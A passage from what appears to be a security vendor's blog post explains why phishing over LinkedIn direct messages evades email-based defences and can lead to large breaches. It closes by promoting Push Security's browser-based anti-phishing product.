But even when spotted and reported by a user, what can you really do about a LinkedIn phish? You can't see which other accounts were targeted or hit in your user base. Unlike email, there's no way to recall or quarantine the same message hitting multiple users. There's no rule you can modify, or senders you can block. You can report the account, and maybe the malicious account will get frozen — but the attacker has probably got what they needed by then and moved on.

Most organizations simply block the URLs involved. But this doesn't really help when attackers are rapidly rotating their phishing domains — by the time you block one site, several more have already taken its place. It's a game of whack-a-mole — and it's rigged against you.

2: It's cheap, easy, and scalable for attackers

There are a couple of things that make phishing over LinkedIn more accessible than email-based phishing attacks.

With email, it's common for attackers to create email domains in advance, going through a warm-up period to build up domain reputation and pass mail filters. The comparison with social media apps like LinkedIn would be creating accounts, making connections, adding posts and content, and dressing them up to appear legitimate.

Except it's incredibly easy to just take over legitimate accounts. 60% of credentials in infostealer logs are linked to social media accounts, many of which lack MFA (because MFA adoption is far lower on nominally "personal" apps where users aren't encouraged to add MFA by their employer). This gives attackers a credible launchpad for their campaigns, slotting into an account's existing network and exploiting that trust.

Combining the hijacking of legitimate accounts with the opportunity afforded by AI-powered direct messages means attackers can easily scale their LinkedIn outreach.

3: Easy access to high-value targets

Like any sales professional knows, LinkedIn recon is trivial. It's easy to map out an organization's LinkedIn profiles and select suitable targets to approach. In fact, LinkedIn is already a top tool for red teamers and attackers alike when scoping out potential social engineering targets — e.g. reviewing job roles and descriptions to estimate which accounts have the levels of access and privilege you need to launch a successful attack.

There's no screening or filtering of LinkedIn messages either, no spam protection, or assistant monitoring the inbox for you. It's arguably the most direct way to reach your intended contact, and therefore one of the best places to launch highly targeted spear-phishing attacks.

4: Users are more likely to fall for it

The nature of professional networking apps like LinkedIn is that you expect to connect and interact with people outside of your organization. In fact, a high-powered executive is far more likely to open and respond to a LinkedIn DM than yet another spam email.

Particularly when combined with account hijacking, messages from known contacts are even more likely to get a response. It's the equivalent of taking over an email account for an existing business contact — which has been the source of many data breaches in the past.

In fact, in some recent cases, those contacts have been fellow employees — so it's more like an attacker taking over one of your company email accounts and using that to spear-phish your C-Suite execs. Combined with the right pretext (e.g. seeking urgent approval, or reviewing a document) and the chance of success increases significantly. 

5: The potential rewards are huge

Just because these attacks are happening over a "personal" app doesn't mean the impact is limited. It's important to think about the bigger picture.

Most phishing attacks focus on core enterprise cloud platforms such as Microsoft and Google, or specialist Identity Providers like Okta. Taking over one of these accounts doesn't just give access to the core apps and data within the respective app, but also enables the attacker to leverage SSO to sign into any connected app that the employee logs into.

This gives an attacker access to just about every core business function and dataset in your organization. And from this point, it's also much easier to target other users of these internal apps — using business messaging apps like Slack or Teams, or techniques like SAMLjacking to turn an app into a watering hole for other users trying to log in.

Combined with spear-phishing executive employees, the payoff is significant. A single account compromise can quickly snowball into a multi-million dollar, business-wide breach.

And even if the attacker only manages to reach your employee on their personal device, this can still be laundered into a corporate account compromise. Just look at the 2023 Okta breach, where an attacker exploited the fact that an Okta employee had signed into a personal Google profile on their work device. This meant any credentials saved in their browser were synced to their personal device — including the credentials for 134 customer tenants. When their personal device got hacked, so did their work account.

This isn't just a LinkedIn problem

With modern work happening across a network of decentralized internet apps, and more varied communication channels outside of email, it's harder than ever to stop users from interacting with malicious content.

Attackers can deliver links over instant messenger apps, social media, SMS, malicious ads, and using in-app messenger functionality, as well as sending emails directly from SaaS services to bypass email-based checks. Likewise, there are now hundreds of apps per enterprise to target, with varying levels of account security configuration.

Stop phishing where it happens: in the browser

Phishing has moved outside of the mailbox — it's vital that security does too.

To tackle modern phishing attacks, organizations need a solution that detects and blocks phishing across all apps and delivery vectors.

Push Security sees what your users see. It doesn't matter what delivery channel or detection evasion methods are used, Push shuts the attack down in real time, as the user loads the malicious page in their web browser — by analysing the page code, behavior, and user interaction in real time.

This isn't all we do: Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, and vulnerable passwords. You can even see where employees have logged into personal accounts in their work browser (to prevent situations like the 2023 Okta breach mentioned earlier).

Source